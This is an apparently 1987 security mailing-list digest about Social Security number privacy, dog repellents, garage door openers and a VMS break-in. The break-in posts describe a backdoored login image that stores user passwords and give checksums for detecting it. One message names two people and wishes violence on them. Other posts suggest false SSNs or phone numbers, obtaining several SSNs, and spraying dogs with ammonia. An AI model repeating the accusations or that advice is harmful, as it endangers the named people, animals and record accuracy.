'girls' are playing and snarl at them. I have heard about aerosol sprays that deter attackers, but can't find them and don't know if they are legal. Someone suggested to my wife that she buy a squirt gun with a 30-foot range and fill it with ammonia to shoot at dogs. Q: Would this work without getting me into a lawsuit from seriously injuring a dog? And what is in aerosol sprays that are used for self defense, if not mace? What sprays are legal and where are they found? I'm not a dog hater. I've never been a dog owner, either. Does anyone have any better suggestions? Randy Morey GE Aerospace Burlington, Mass RMOREY%ATLAS%RCA.COM@RELAY.CS.NET From: jeff%venus@rand-unix.arpa 24-Jul-1987 11:09:04 To: security@RUTGERS.EDU, jeff%venus@rand-unix.arpa Subj: [548] Re: SS# & Utilities -- a story To the best of my recollection, the last time I renewed my California driver's license, I was told my SS# was required. I asked for confirmation, saying it was my understanding that it could not be required by law, but they were adamant, so I did not pursue the issue even to the point of asking to talk to a supervisor. Jeff Rothenberg The RAND Corp. jeff@rand.org From: DKAVNER@ecla.usc.edu 24-Jul-1987 17:22:10 To: security@RUTGERS.EDU Subj: [863] Re: SS# and Utilities For many years I have tried to avoid giving out my SS#. Most of the time I have no problem, but occasionally I have given in due to a lack of knowledge on the applicable laws. It is great to hear of someone who has been so successful. It seems that the majority of people have no idea of the problems of in giving out such information and that our government continues to encourage it. One of my biggest frustrations is interest bearing bank accounts. The IRS requires you to give the bank your SS#, but as far as I know there are no restrictions on what they can do with it. Does anyone have a solution for this? My SS card has the phrase "For tax purposes only, not for identification". Do the new cards issued today still have this phrase? From: djw@lanl.gov (David Wade) 30-Jul-1987 12:20:31 To: hao!gatech!spaf@ames.arpa, security@RUTGERS.EDU Subj: [6731] Re: SS# & Utilities -- a story 1) Do many of you (net-readers) withhold your SS# in similar circumstances? Do you have these kinds of confrontations too? Yes, but not wholly successfully. I too have kept my SSN private for the last eight or nine years. I had given the number out whenever asked up until that time. Now I sometimes run into the consequences of that action. The University of New Mexico 'requires' your Social Security Number whenever you enroll in classes. If you are a foreign national, the University will assign you a number; if you are a US Citizen, they will not. I was not able to test this because I had previously given them my SSN. However, we got all my records marked such that the University won't give out my SSN without a court order. 4) Should I bother to follow-up on this further? That is, should I bother contacting the Public Service commission in Indiana about the treatment I received? (I'm currently not sure it is worth the effort). The telephone companies have had their own way for so long that it is nice to finally see that turning around. You seem to think highly of Southern Belle while you express surprise that they had information about you that you had never given them and that you think they didn't need. The Privacy Act of 1974 covers only the government and its subcontractors. Currently, private companies can require whatever information they think their customers will provide. You may argue that Southern Belle is a subcontractor and you would be correct, but most people don't believe that your little problem applies to their great big company. From "The Report of The Privacy Protection Study Commission" a booklet known as appendix 4, "The Privacy Act of 1974: an Assessment" page 3. ============================================================================= Government contractors are another category of entities to which the Privacy Act applies. Subsection 3(m) of the Act provides that: When an agency provides by contract for the operation by or on behalf of the agency of a system of records to accomplish an agency function, the agency shall, consistent with its authority, cause the requirements of . . . [the Act] to be applied to such system. For purposes of subsection (i) [the criminal penalties provision] of [the Act] any such contractor and any employee of such contractor, if such contract is agreed to on or after the effective date of [the Act], shall be considered to be an employee of an agency. [5 U.S.C. 552a(m)] ============================================================================= ibid.,pp.35 The Privacy Act also establishes criminal penalties for certain knowing and willful violations of its requirements. Subsection 3(i) provides that an officer or employee of an agency may be found guilty of a misdemeanor and fined up to $5,000 for knowingly and willfully disclosing individually identifiable information, the disclosure of which is prohibited by the Act or agency regulations thereunder, or for willfully failing to publish an annual "Federal Register" notice on a system of records. The same penalties may also be assessed against anyone who knowingly and willfully requests or obtains an agency record about an individual under false pretenses. ============================================================================= ibid.,pp.5 What is Covered by the Act Where the Act fails to meets (sic) its objectives, the failure can often be traced, in part, to the record and system-of-records definitions that further limit its scope of application. The Privacy Act applies to a "record" that is "retrieved" from a "system of records" by the name of an individual "or by some identifying number, symbol, or other identifying particular" assigned to him. [5 U.S.C. 552a(a)(5)] As defined in subsection 3(a)(4), "record" means: . . . any item, collection, or grouping of information about an individual that is maintained by an agency, including, but not limited to, his education, financial transactions, medical history, and criminal or employment history and that contains his name, or the identifying number, symbol, or other identifying particular assigned to the individual, such as a finger or voice print or a photograph.[5 U.S.C. 552a(a)(4)] ============================================================================= However... ibid. Thus, unless an agency, in fact, retrieves recorded information by reference to a "name. . .identifying symbol, or other identifying particular. . .," the system in which the information is maintained is not covered by the Act. ============================================================================= You need to inform each "agency" what you consider "individual identifying information". You may then tell them that your 1) Name 2) Birthdate 3) Social Security Account Number (The one which identifies your retirement insurance payment information; and generally is of the form 123-45-6789...) 4) Street Address in conjunction with physical description information, 5) Phone Number in conjunction with physical description information, are sufficiently private that they may not disclose these numbers without your specific written authority, and that the "agency" must show you a log of everyone who has had access to these "records". If they cannot do this before you give them the information, they are already in violation. What makes you think that they will clean up their act after you tell them your "Retirement Account Number". These Privacy Act reports state that the majority of the burden of enforcement rests on the individual, and that the individual wasn't really interested. The Privacy Act was being observed as though it were a "good idea at the time, but not really applicable to 'my agency's situation'". A letter about Southern Belle's having "acquired" your SSN should probably be directed to the Data Processing Manager explaining that he is liable for a $5,000 fine and that he'd probably better "cut it out". You did the proper thing to the "cracker" at Indiana Bell, but you should send them a copy of what you send to Southern Belle, this note with an explanation of what the 'Risks' group is, and a request for an apology and notification that the above listed items are Privacy Act items. You won't be able to get a free unlisted phone that way, (I think, I really don't know, but the book says that that information is in the public domain). But you can certainly stop the harrassment from the Service Representatives. Dave From: James M Galvin 31-Jul-1987 10:42:11 To: security@RUTGERS.EDU Subj: [533] giving out your phone number Gene Spafford's note made me think about giving out phone numbers. When you use a credit card, store clerks always ask you to sign the receipt and right down your phone number. Sometimes they ask for your address. Now, I don't normally like to give my phone number, even if it is listed in the phone book. So, I have always wondered, can they force you to give out your phone number? Jim From: IWAMOTO%NGSTL1%eg.ti.com@relay.cs.net 28-Jul-1987 13:25:14 To: security@RUTGERS.EDU Subj: [786] RE: SS# & Utilities -- a story Ok...maybe I'm a little naive... First, of all, I didn't know you could withhold your social security number. I have been giving it out just as a matter of course never realizing that I could withhold it (not to mention that it was against the law to force me to give it out). That's interesting and I may decide to use it, although, at this point, it's probably all over the place so its probably not worth my effort. I am very interested in hearing how it can be abused, however. Could you please elaborate on this a little? Warren M. Iwamoto Artificial Intelligence Laboratory Texas Instruments, Inc. iwamoto%ngstl1@eg.ti.com From: John Owens 15-Aug-1987 10:12:39 To: SECURITY@RUTGERS.EDU, WBD.MDC@office-1.arpa Subj: [718] Re: Garage Door Openers (not your typical question) Well, most garage door openers that I've seen (I don't have one myself, not having a garage) have a set of DIP switches you can use to encode a unique pattern. The frequencies, at least within the same brand, are the same. So you could set your two openers to be one bit apart, and leave the hood off of the dip switches, and switch the one bit.... John Owens Old Dominion University - Norfolk, Virginia, USA john@ODU.EDU old arpa: john%odu.edu@RELAY.CS.NET john@xanth.UUCP old uucp: {decuac,harvard,hoptoad,mcnc}!xanth!john From: Brint Cooper 18-Aug-1987 13:44:30 To: Security@RUTGERS.EDU Subj: [877] Re: SS and the data theives... Nearly all of the requests for SSN that I have seen have not required me to produce the card. In every case that I can think of, I could just supply the number from memory. What's to prevent someone who objects to passing his/her SSN around the town to provide a false one? Similarly, many places now require a phone number on a credit card slip (Visa/MC). They don't check this number as part of verification. In restaurants, it's not even requested until you're signing the slip and leaving. I wonder what they do with this info. It might help someone who's fradulently using your credit card number. It might also be sold to telemarketing firms. Again, why not submit a false one? Or your work phone? Or whatever? _B From: "McMahon,Brian D" 12-Aug-1987 12:10:25 To: SECURITY@RED.RUTGERS.EDU Subj: [4400] More bad news on EMBL break-in From: "McMahon,Brian D" To: SECURITY@RED.RUTGERS.EDU Subject: More bad news on EMBL break-in Yesterday, I posted a message from the info-vax list to this board; at least, I *think* I posted it. I never actually saw it leave. Just in case, I'll repeat that before going on to the latest combat reports, and network loads be damned - this is serious. In a message dated 31-Jul-1987, Roy Omond of the European Microbiology Lab in Heidelberg reported the following hair-raising story: >Well, the well known patch to SECURESHR.EXE took a *long* time in coming >to Europe. In fact, it took me several days to convince the local DEC >people that there was a security loophole in VMS 4.5 ... *sigh*. >Anyway, in the meantime, we got screwed around by German hackers >(probably from the notorious Chaos Computer Club in Hamburg). Before I >had the chance to install the patch, "they" managed to get in and did >pretty well at covering their tracks. They patched two images, SHOW.EXE >and LOGINOUT.EXE, so that a) they could login to *any* account with a certain >password, which I'll not divulge, b) SYS$GW_IJOBCNT was decremented and >c) that process would not show up in SHOW USERS. They have cost us a lot of >real money by using our X.25 connection to login to several places all round >the globe. I have done my best to notify per PSImail those VAX sites that >were accessed from our hacked system. I pray (and pray and pray ...) that >no other damage has been done, and that I'm not sitting on a time bomb. >Anyway, the following information might help others to check if they have >been tampered with: > >Use CHECKSUM to perform a checksum of LOGINOUT.EXE and SHOW.EXE as follows: > > $ Check Sys$System:Loginout.Exe > $ Show Symbol Checksum$Checksum > > if you get the value 3490940838 then you're in trouble. > > $ Check Sys$System:Show.Exe > > if you get 1598142435, then again you're in trouble. > >Now something I'm a bit unsure about whether I should publicise : > >Two persons with known connections with the Chaos Computer Club in Hamburg >who I know have distributed the patches mentioned above (and in my opinion >are to be considered along with the lowest dregs of society) I will name >here : > > Claus Traenkner (at our own outstation of the EMBL in Hamburg) >and Stefan Weirauch (at the Univ. of Karlsruhe) > >in the hope that someone somewhere will a) be saved some hassle from them >and b) might perform physical violence on them. > >Jeez, I'm scared ... > >Roy Omond Pretty bad, already. But today, I found this cheery piece, dated 04-Aug-1987: >Further to my "important message" of last week, I have since discovered >that the patches done to LOGINOUT.EXE were even more lethal than I had >imagined. Not only would it allow entry to any username with the magic >password, but it would also store (in 1's complement form) the valid >password of all users logging in since the patch was installed in the >12 bytes "reserved for customer use" in the UAF. How many system managers >ever even look at these bytes, never mind spot the danger there ? > >Well, they also distributed a small vanilla program to decypher these >bytes and, lo and behold, a list of username/password pairs with accounts >with (potentially) all privileges neatly marked with an asterisk. > >So everyone who even suspects that something might be amiss, look very >closely at your UAF. Look in particular at the 12 bytes from offset >1f6 (hex) in each record. If you reverse the 1's complement on these >bytes and get something that looks like a password then ... :-( > >(Users with passwords longer than 12 characters or those with 2 passwords >(like me) are relatively ok). > >Yet another hacker name to surface is user DKL at Bitnet/EARN node >DHDMPI5 (the Max-Planck Institute for Atomic Physics, our neighbouring >institute in Heidelberg). I don't know who the person is, but I hope >that he/she is condemned to working with IBM MVS for evermore. I will post to info-vax the suggestion that further developments be send to this list, as well as to info-vax, by their originators, so you won't have to deal with me any more. I have a hunch this may not be over yet... Brian McMahon, Grinnell College From: "Stefan Weirauch, IRA, Uni Karlsruhe" 12-Aug-1987 12:48:12 To: info-vax%sri-kl.arpa%germany.csnet@RELAY.CS.NET, Subj: [3566] RE: *** Important message *** Remarks on the messages from Roy Omond (31-Jul) and Michael Bednarek (4-Aug). Just back from my summer holidays I have to notice some very strange statements in connection with my name. Roy Omond wrote: > Now something I'm a bit unsure about whether I should publicise : He better should have given it more thought... > Two persons with known connections with the Chaos Computer Club in Hamburg > who I know have distributed the patches mentioned above (and in my opinion > are to be considered along with the lowest dregs of society) I will name ======================= This is, in fact, a primitve insult, based on nothing but speculations. > Claus Traenkner (at our own outstation of the EMBL in Hamburg) > and Stefan Weirauch (at the Univ. of Karlsruhe) > > in the hope that someone somewhere will a) be saved some hassle from them > and b) might perform physical violence on them. ========================= Well, just an instigation to perform violance. To build an opinion about this way of writing a public message is left to the reader. However, as System/Security Manager I know very well those problems with hackers (see below). In case of detecting such a penetrator, I grab him and take further steps personally. At my site no personal mail relative to those topics in Roy Omonds message reached me. May be, that is not astonishing in the light of a message, which is based on some vague informations. Michael Bednarek wrote: > I knew I had seen this name before, and (using rn) the command ?weirauch?ra > showed article <8707221338.AA29452@ucbvax.Berkeley.EDU> which is a patch > to PHONE. The date was 21-Jul-1987. > > In the light of Roy's experience you might want to examine the nature of that > patch. Well, this comment fully deserves my agreement, because you will see, how well written the Phone Patch is (of course, I mean the second, bugfixed version). But, does it make sense, to examine software, distributed over the net, only if there is someone, railing at the creator ? I think, you allways should very carefully examing such software, performing modifications of the operating system. If your are not able to do this, for example, because you have no micro-fiches, it is reasonable to wait for such modifications from DEC. I did not add such a hint to my PHONEPAT - description, because I suppose, we all think that way. As I mentioned in my PHONEPAT message, there are many clever student users at our site, detecting bugs or undocumented features in VMS. I spend a lot of time in preventing them from successfully attacking the system. To do this efficiently I made my thoughts about the things a hacker might perform. Thus, I learned much, and hacked patches to parts of the system as a problem of system security (again affecting my nerves and time) are old for me; if they are new to you, dont accuse those people, making their experiences with these aspects of security, but learn from them and be thankful ! Stefan Weirauch CSNET: WEIRAUCH%iravcl@germany.csnet Informatik-Rechner-Abteilung UUCP: WEIRAUCH%iravcl%uka.uucp@unido.uucp Universitaet Karlsruhe PSI: PSI%026245721042100::WEIRAUCH D-7500 Karlsruhe 1 West Germany From: davy@intrepid.ecn.purdue.edu (Dave Curry) 29-Aug-1987 12:03:02 To: RMOREY%ATLAS%rca.com@relay.cs.net Subj: [1496] Re: Dogs, defense against From: RMOREY%ATLAS%rca.com@relay.cs.net Date: Fri, 31 Jul 87 11:03 EST Subject: Dogs, defense against I have heard about aerosol sprays that deter attackers, but can't find them and don't know if they are legal. Someone suggested to my wife that she buy a squirt gun with a 30-foot range and fill it with ammonia to shoot at dogs. Q: Would this work without getting me into a lawsuit from seriously injuring a dog? Ammonia? Sounds pretty nasty, and I would think it could hurt the dog. I've always heard lemon juice is what you should use. And what is in aerosol sprays that are used for self defense, if not mace? What sprays are legal and where are they found? Well, there is "PARALYZER", which is basically Army tear gas. It comes in a small black aerosol; most "army surplus" type stores sell them, among other places. I'm not sure what a dog would do if you sprayed him with it though; the stuff is NASTY. I'm not a dog hater. I've never been a dog owner, either. Does anyone have any better suggestions? Most of the postal carriers here have some sort of small aerosol clipped to their mail bags; I assume it is for discouraging dogs. You might call your local post office and ask them what they recommend. --Dave Curry From: Carl DeFranco 31-Aug-1987 09:30:52 To: rmorey%atlas%rca.com@relay.cs.net, security@RUTGERS.EDU Subj: [1674] Personal protection from Dogs I'm assuming this is related to the net. R. Morey inquired about things to protect people from less than freindly dogs. There are a number of such products available, tho' I'm not sure of the sources. 1. STOP! is an aerosol designed for protection specifically from dogs. Aimed at their snouts, it will stop them in their tracks without doing permanent harm. A bicycling friend of mine swears by it. 2. DAZER is a new electronic device that generates high frequency sound painful to dogs. A recent Syracuse, NY newspaper article described tests as ambiguous - when it worked it worked very well. 3. The originally mentioned ammonia squirt gun trick is very effetive if you can hit the dog. Regarding liability for hurting dogs: I'm not a lawyer, but in nearly every community, some form of leash laws exist. Even when they don't, a pet owner is responsible for his/her pets actions. If they leave the confines of the owners property, you are justified in using reasonable means, including physical harm if truly necessary, to protect the health and safety of yourself and your family. I personally wouldn't hesistate to take action against a dangerous animal if it threatened me, my wife, or my children. I would also be glad to answer any pet owners complaints about my treatment of their animal. By the way, I have a large dog and two cats of my own - I'm NOT an animal hater. Carl DeFranco DEFRANCO@RADC-TOPS20.ARPA From: mason@oberon.lcs.mit.edu (Nark Mason) 31-Aug-1987 15:44:09 To: RMOREY%ATLAS%rca.com@relay.cs.net, SECURITY-REQUEST@RUTGERS.EDU Subj: [1095] Re: Dogs, defense against There are two kinds of spray dog repellants I know of, one's mace (CN or CS gas) and the other's just something nasty billed as a dog repellant. Generally either one will repel an attacker, man or dog. But if you run into a really mean dog or really mean (or drugged) human it will just make them mad. I've spent a lot of time biking in the mountains in western mass and NY and have had problems with dogs. I got a can of mace (CN I think, it was illegal - tear gas), next dog I ran into I leveled the can at him and he ran for cover before I had a chance to douse him. I haven't carried a can since, all the dogs I've run into KNOW, they've been maced before. Unless the dogs are an extra ornery junkyard type mace, CS, CN or dog repellant will teach them quickly to stay away. (good luck finding the stuff, I believe it's illegal many places - my grandmother got some from her mailman once [for use on dogs]) From: 14-Sep-1987 11:23:43 To: SECURITY@RED.RUTGERS.EDU Subj: [1928] Hackers - NASA - Warning You have probably already seen this, but just in case... Selden E. Ball, Jr. (Wilson Lab's network and system manager) Cornell University NYNEX: +1-607-255-0688 Laboratory of Nuclear Studies BITNET: SYSTEM@CRNLNS Wilson Synchrotron Lab ARPA: SYSTEM%CRNLNS.BITNET@WISCVM.WISC.EDU Judd Falls & Dryden Road HEPnet/SPAN: Ithaca, NY, USA 14853 LNS61::SYSTEM = 44283::SYSTEM (node 43.251) --------------------------------------- From: Jnet%"C0033001@DBSTU1" 14-SEP-1987 08:17 To: SYSTEM Subj: Hackers - NASA - Warning From: Helmut Woehlbier +49 531 391 5513 Subject: Hackers - NASA - Warning I'm the technical representative (networking) of Braunschweig University, Germany and I forward the following lines of my friend who is working for the German news agency (dpa). Kind regards, freundliche Gruesse Helmut Woehlbier - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - German hackers has successfully attacked the NASA and will reveal that tomorrow (tuesday, sept. 15) in the German news magazine 'Panorama', which will usually be seen by 10 - 12 million people. Newspaper articles by dpa (German news agency) will appear simultaneously. Hackers wonder why the doors of NASA are still wide open. In his "important message" Roy Omond (DHDEMBL5) speaks of a magical password. Perhaps it is the same still now. This is the third warning to the NASA (the first two were sent via SPAN-net). I wonder, why the NASA neither answers nor react. Other systems are also open, because they implemented the Troian Horse via their backups after having installed the mandatory update by DEC to patch the former security hole. signed Jochen Sperber From: GREENY 17-Aug-1987 10:49:48 To: Subj: [1250] re: Garage Door Openers >A friend of mine has a two car / two door garage. He wants to install >a remote control garage door opener on both doors with different frequencies >for each door. He would also like ONE controller ... Seems simple enough to me. The crystals in those handy-dandy garage door openers are *usually* (if they arent...just de-solder em..) plugged into a socket somewhere in the controller. Just mount the two crystals somewhere else and wire them thru a DPDT (Double Pole Double Throw) switch from Radio Shack and wire the switch into the now empty socket from the crystals. Stick it in the car with some double stick mounting tape, and label the switch Left/Right or 1/2 or 0/1 (whatever suits your fancy...) and then hit the button. When it's on "1" door "1" opens, and when on "0", door "0" opens....no biggie. And if there is such an "off the shelf" (i.e. Unhackerish) type available, it probably is part of a so-called "system" and costs giga- bucks!... Hope this helps.... bye for now but not for long.... Greeny Bitnet: miss026@ecncdc Internet: miss026%ecncdc.bitnet@wiscvm.wisc.edu From: Joe Harrington 17-Aug-1987 22:22:51 To: security@red.rutgers.edu Subj: [906] ssn's MIT, in a noncharacteristic burst of liberal generosity (or they're tired of getting kicked in the *** by people who demand their rights), gives you the option of having your ssn or a pseudo ssn which they provide as your MIT ID number. The pseudo ssn's all begin with 888, as (so goes the story) there have not (yet) been any real ssn's issued with that prefix. If it is true that no 888 numbers have been issued (please reply if you think otherwise and have counterexamples), then giving some random 888 number as your ssn could be an easy solution for people who wanted to hide theirs and avoid hassle (though be careful about misrepresenting yourself on signed legal documents). Unfortunately, it is too late for me, as my ssn is plastered all over everything. Oh well, --jh-- From: "Mike @ (214)575-3517" 18-Aug-1987 12:27:21 To: security@RUTGERS.EDU Subj: [824] re: garage door openers sure, you can do that .. but not by changing the frequencies. Some of the new garage door openers send a digital code (typically 8 bits) as part of their signal. The door opener and the controller have to be set to the same code for it to work. All you need is two openers (same brand and model) and one controller. To change codes on my controller, their are some jumper cables that you cut to set the bits. Wire a switch up to one of the jumper cables. Set the codes in the door openers so they only differ by one bit (the one with the switch). Now the switch allows you to send two different codes, one for each door. Enjoy, Mike Linnig, Texas Instruments From: John Pershing 31-Aug-1987 09:56:35 To: security@RUTGERS.EDU Subj: [727] There used to be a product called "Halt!", sold at bicycle stores, that was *quite* effective at stopping charging dogs in their tracks. However, I have no idea what would happen when it wears off, as I was always long gone by that time -- maybe you would simply have a very angry dog on your hands... Halt! is more-or-less aerosol Tabasco Sauce, and does not cause any harm to the dog; ammonia, on the other hand, can cause blindness if you get it in the dog's eyes. I don't know if Halt! is still available, but I assume that it is -- check out your local bike shop. John A. Pershing Jr. From: Simson L. Garfinkel 31-Aug-1987 14:04:19 To: Security@red.rutgers.edu Subj: [2410] Mail (I saw this on somebody's desk today. It is on official stationary.) NATIONAL SECURITY AGENCY Fort George G. Meade, Maryland, 20755-6000 Serial: V1-072/L-87 24 July 1987 Dear Gentlemen and Ladies: The National Security Agency, in conjunction with four major U. S. Corporations, is currently developing a new family of secure telephones. These new phones, designated STU-III, will begin fielding in October 1987, and will serve as the primary secure telephone for the U. S. Government and its contractors. In support of this program, the National Security Agency will host a "STU-III" Seminar for U. S. Contractor Personnell" on 5-8 October 1987 at the Aladdin Hotel, Las Vegas, nevada. The purpose of this seminar is to furnish the U. S. contractor community with essential information on the STU-III family of secure telephones, and to provide a forum for discussing STU-III issues of mutual interest. This meeting is the only one of its type planned for the contractor community in the foreseeable future. If your company plans to acquire STU-III terminals, appropriate personnel should attend. ... Highlights from agenda: Tuseday, 6 October 1987: STU-III overview and Program status STU-III Implementation Schedule and Field Plans STU-III Testing (Progress report and future plans) STU-III Vendor Presentations AT&T Motoroal RCA WEDNESDAY, 7 October 1987 STU-III Key Management System Overview STU-III TErminal Keying procedures Vendor Keying Demonstrations STU-III Doctrine Contractor STU-III Key Management Sturcture Command Authority/User Representative/COMSEC Custodian Relationships Thursday, 8 October 1987 STU-III Key Ordering and Distrib7ution Accounting for STU-III Key Key Management System Milestones and Schedule .... A security clearance is not required for attendance at this seminar. However, attendance will be limited to U. S. Citizens only, and the attached registration from must be signed by each attendee. The name and phone number of a company security officer should also be provided, so that U. S. citizenship may be verified. Further information concerning the seminar may be obtained from Mrs. Linda Amrein, Miss Maureen Anderson, or Mr. Bill Johnston on (301) 688-7897/8255. From: James M Galvin 31-Aug-1987 14:38:55 To: security@RUTGERS.EDU Subj: [660] giving out phone numbers Hmmm, watching all the discussion about social security numbers, I am curious about two things in regards to phone numbers. When I use my credit card retailers invariably ask for a phone number under your signature, and worse insist on it. Generally I just give them a random number. (I even used 999-123-4567 once, and nobody noticed.) First, can a retailer insist on a phone number? Second, am I in trouble for giving out wrong numbers? And just to go a step further, what about when they ask for your address? Jim From: mason@oberon.lcs.mit.edu (Nark Mason) 1-Sep-1987 09:09:00 To: security@RUTGERS.EDU Subj: SS #'s There's been a lot of talk about how not to give out your SS #, the one thing I still fail to understand is why not give out your SS #? How can it be abused? From: "Bryan, Jerry" 1-Sep-1987 14:40:51 To: Subj: SS# & Utilities -- a story >To the best of my recollection, the last time I renewed my California >driver's license, I was told my SS# was required. I asked for confirmation, >saying it was my understanding that it could not be required by law, but >they were adamant, so I did not pursue the issue even to the point of >asking to talk to a supervisor. > Jeff Rothenberg > The RAND Corp. > jeff@rand.org My understanding is that in about 1979 or so, Congress made an explicit exception to the Privacy Act of 1974 to explicitly permit states to use SSN's for all forms of motor vehicle registration, including both your driver's license and the registration of your car. This means, of course, that the original Privacy Act really does not mean anything any more because your driver's licence is such a ubiquitous ID that once there, it is available to all the world. From: "Bryan, Jerry" 1-Sep-1987 14:53:04 To: Subj: SS# and Utilities >One of my biggest frustrations is interest bearing bank accounts. The IRS >requires you to give the bank your SS#, but as far as I know there are >no restrictions on what they can do with it. Does anyone have a solution >for this? Write your congressman. Existing law is *not* on your side. I fear I am cynical, but I have lost several times -- after fighting hard and even hiring lawyers. Present law favors, encourages, and often requires the use and disclosure of SSN's. The somewhat limited provisions restricting SSN's that were present in the Privacy Act of 1974 have been emasculated by subsequent legislation. From: 1-Sep-1987 17:03:33 To: security@red.rutgers.edu Subj: Social Security Numbers From: Scott Dennis, Computer Support Subject: Social Security Numbers In Alaska, they appear to have a more enlightened approach to Social Security numbers. When I renewed my drivers license a couple of years back, I told them to remove it. The clerk didn't know how to do it, but the supervisor was very helpful. My license now shows 000-00-0000 in the SS # location. My other experience with this was at Arizona State University, where they use it for a student ID number. I refused to give it, and they were happy to issue me a 998-xx-xxxx number. Their forms call it a 'student ID #' The University of Alaska is pretty insistant on getting the actual number, however. Their forms have the gall to always call it a 'SS #' From: David Lyle 2-Sep-1987 11:35:20 To: Subj: Social Security Numbers According to Social Security Administration Publication No. 05-10001 (Sept 86) DISCLOSING YOUR SOCIAL SECURITY NUMBER "Any Federal, State or local agency that asks for your Social Security number must tell you whether giving it is mandatory or voluntary, under what authority the number is being requested, and what uses will be made of it. Some non-governmental organizations also use Social Security numbers for recordkeeping purposes. Such use is neither required nor prohibited by Federal law. Although you are not required to give you number, the organization is not required to provide you service if you do not. Knowing your number does not allow these organizations to get information from your Social Security record." --David Lyle --Univ. of Ill. Foundation From: Don_Lewine@SDD.CEO.DG.COM 10-Sep-1987 17:43:25 To: SECURITY@RED.RUTGERS.EDU Subj: Social Security Numbers There is no law against getting several SS#s. I have several. I keep one for the IRS and use the others for drivers licences, credit, education, and so on. Because they are "my" ss#s, I know that no one else is using them. P.S. The way one gets multiple numbers is by goinng into the SS office and saying you lost (or never had) your number. From: Simson L. Garfinkel 11-Sep-1987 15:48:48 To: IWAMOTO%NGSTL1%eg.ti.com@relay.cs.net Subj: SS Abuse Cc: security@RUTGERS.EDU TWIMC: It's beginning to appear that my master's project at Columbia will be on abuse of social security numbers. Here's my first story: John Stein (not his real name) teaches writing and performs technical consulting at Columbia University. He is married, has two children, a house in New Jersey, and a six-figure income. Two years ago, John and his wife went to Hawaii for his semester long sabatical. Because of his income, John is required by law to file estimated income tax payments every semester. Naturally, John filed these payments from Hawaii. When he returned to New Jersey, he found that some of his mail had not been forwarded while he was on vacation. Among these was a notice from the IRS saying that they had not received his estimated tax payments and that a lean had been placed on his house for the overdue taxes. Now, by this point John had the cancled checks. It took over two months of working with the IRS to find out what had happened: The taxes had been mailed from Hawaii, and the Post Office had delivered the checks to the IRS's branch office in California rather than in New York. This was the year that the IRS had all of its computer screw up problems, so the tapes from California were never run against the tapes from New York, an the credit was never picked up. Once this was all traced down, the IRS removed the lean on the house. Nothing happens for two years, until John applies for a loan and has it rejected by the bank because he is a credit risk. Aparently, in the TRW credit database, which is indexed by SSN, there is a statement saying "123-45-6789 (not his real SSN): Lean removed from house. ". The bank would not give a loan to somebody who had a lean on his house. John contacted the bank, provided documentation from the IRS that the lean had been placed in error, and eventually, after a lot of hassle, got his loan approved. The next year, when he tried to get a Sears Discovery card, the same thing happened again. This time, he sent a copy of all the documentation to the TRW credit database, asking them to remove the "lean removed" statement from their records. They didn't. Instead, they added to their records that the lean had been issued by the IRS, and that the IRS later said that the lean had been issued in error. Rather than face continued hassles, John has decided to work with his current bank for all future credit transactions. Unfortunately, he has to do this for the rest of his life. ================================================================ If anybody has a story, please send it to me. I'm collecting them. Please also send me your phone number and tell me if you would mind being interviewed for this project. Thank you. From: Kevin M. Leahy 11-Sep-1987 21:48:52 To: IWAMOTO%NGSTL1%eg.ti.com@relay.cs.net, security@RUTGERS.EDU Subj: RE: SS# & Utilities -- a story Cc: LEAHYKM@a.isi.edu I am certainly the most naive on this discussion group. What is the big deal about giving out your SSN?? Has anyone actually been harmed by giving out the number? I sense that there is really something that I am missing, buit this won't be the first time. I'm sorry, but I really can't get worked up over giving out 9 numbers which represent who I am no less than my signature (when legible) does. Is this a practical point or a philosophical one? Wondering, Kevin (SSN withheld pending enlightenment.) Kevin Leahy LEAHYKM@A.ISI.EDU From: Brint Cooper 12-Sep-1987 04:45:25 To: Security@RUTGERS.EDU Subj: Re: SS and the data theives... During this discussion, many folks have asserted that, under federal law, no one may require your SSN except for very specific purposes such as taxation. I wonder if this is true? To my knowledge, the Privacy Act applies only to the Federal Government and to contractors operating on its behalf. Is this not true? I don't believe it is illegal for a university to use a student's SSN as his/her student id. Can someone provide an authoritative statement on this? _Brint From: Mary Akers 1-Sep-1987 10:38:49 To: Security@RUTGERS.EDU Subj: [5604] Social security # - a different viewpoint I received this over the net from a friend. I thought it would make an interesting counter point to the recent discussion on releasing Social Security Numbers - note the section about using false numbers. ------------------------------------------------------------------------ Date: Tue, 11 Aug 87 19:00:24 edt From: decvax!LOCAL!minow@decwrl.dec.com (Martin Minow) To: decwrl!risks@csl.sri.com Subject: [Found on Usenet (net.consumers)] Social Security Administration -- Inside Scoop From: lance@ubvax.UUCP (Lance Keigwin) Just after college I accepted a job with the Social Security Admin (SSA) in a NYC district office. I spent several years with SSA as a claims representative, operations supervisor, and regional program specialist. Fortunately I had the good sense to leave several years ago, when it became very clear that federal service was not an alternative to anything. In these jobs I dealt with all levels of the SS program. Undoubtedly the two biggest headaches for SSA (and the public claimants) were resolving discrepancies in dates of birth and earnings records. Screwups in establishing age is another story, and far less controversial. SSA's record there is really pretty good, if the claims rep is not a dope. But scrambled earnings records are almost impossible to fix. This usually happens when somehow an employer gets a hold of a wrong number, usually from an employee (although the employer could pick it up from almost anywhere...and they do!). Of course there is cross-checking against what SSA believes is the right name and number but all it takes is some (#$%@$%) clerk to cross refer two numbers to the same person and zap! Suddenly you're record relects someone else's wages too. Or worse: your covered earnings are credited to some third party. This happens all the time because people forget their numbers, re-apply for a second one, guess wrong, etc. Safeguards exist but if you consider the scale here (all those workers, all those employers, and the general interest of the average gov't employee in doing the job right even if it means more work and worsened processing statistics) there are bound to be major problems. When does the error come to light to you, John Q. Public? If at all, almost always at retirement, some decades in the future; at a time when many employer records are gone, if not the employer itself, and your recollection is at best fuzzy. Chances are probably 9 in 10 that you'll never get credit for all the taxes you paid, if your record is messed up obviously enough for a rep to notice it and to look into it. My advice: 1) Never, NEVER give anyone a fake SSN. It will haunt you later in life. If SSA has to search for earnings under a different number (spotted on an application for employment, a credit card report, school record, etc.) you will suffer significant delays in getting your correct benefit at best. More likely, you will never live to see the tax credit. 2) Always, ALWAYS request a statement of your earnings every three years. There are screwy statute of limitations regulations (3 years, 3 months and 15 days), about when an error can be corrected. Also the statement of earnings you get will only breakout the last several years individually, and will total all prior years in one lump sum, so it it good to do it periodically. 3) If you suspect an error, ask for a complete posting of each year (a "certified earnings record"). If you're given a little card to complete and told it will be mailed to you, don't buy it! You can only get a complete record by seeing a Service or Claims representative, who must complete an SSA-450 for transmission to HQ in Baltimore. Insist on a 